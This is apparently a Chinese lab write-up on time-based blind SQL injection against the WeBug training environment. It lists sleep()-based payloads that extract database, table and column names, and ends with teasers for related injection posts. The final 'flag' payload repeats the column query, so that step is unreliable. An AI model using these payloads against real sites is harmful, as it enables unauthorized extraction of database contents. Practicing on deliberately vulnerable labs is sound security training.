webug延時注入

2021-09-28 05:09:28 字數 1017 閱讀 1615

通過之前的報錯可以得知sql語句

利用sleep()函式構造延時語句,發現頁面延遲響應

和布林注入一樣,通過觀察頁面狀態來猜測資料庫名、表名等資訊

爆當前資料庫名

if(ascii(substr(database(),1,1))>118,1,sleep(5))%23

如果大於118返回1,否則執行sleep(5)

爆出當前資料庫名webug

爆出webug下面的表

and if(ascii(substr((select table_name from information_schema.tables where table_schema=『webug』 limit 0,1),1,1))>99,1,sleep(5))%23

爆出webug下的表:data_crud,env_list,env_path,flag,sqlinjection,user,user_test

在布林關中知道flag在env_list下,直接爆env_list下的列

if(ascii(substr((select column_name from information_schema.columns where table_name=『env_list』 limit 0,1),1,1))>104,1,sleep(5))%23

env_list的表裡有:id,envname,envdesc,envintegration,delflag,envflag,level,type

爆flag

if(ascii(substr((select column_name from information_schema.columns where table_name=『env_list』 limit 0,1),1,1))>104,1,sleep(5))%23

webug4 0 顯錯注入

0x01 mysql資料相關知識 1.mysql三種注釋風格 單行注釋 sql語句後使用字元 或者 進行注釋 多行注釋 使用 將sql語句圈起來注釋 內聯注釋 內聯注釋是mysql資料庫為了保持與其他資料庫相容,特意新增的新功能。把mysql特有的語句放在 中 2.union聯合查詢 1.union...

webug4 0 寬位元組注入

在php mysql中,可以通過轉義特殊字元來防止汙染sql語句 防注入 有兩種情況 魔術引號,magic quote gpc 開關,不過高版本的php將去除這個特性 安全函式,addslashes,mysql real escape string,mysql escape string等。上有計策...

ACCESS延時注入

這也算是個新知識吧。今天遇到個站,實實在在存在注入,但是弄不出欄位。本應該可以用便宜注入。但是不知道為什麼就是就是弄不出來.payload select count from msysaccessobjects as t1,msysaccessobjects as t2,msysaccessobje...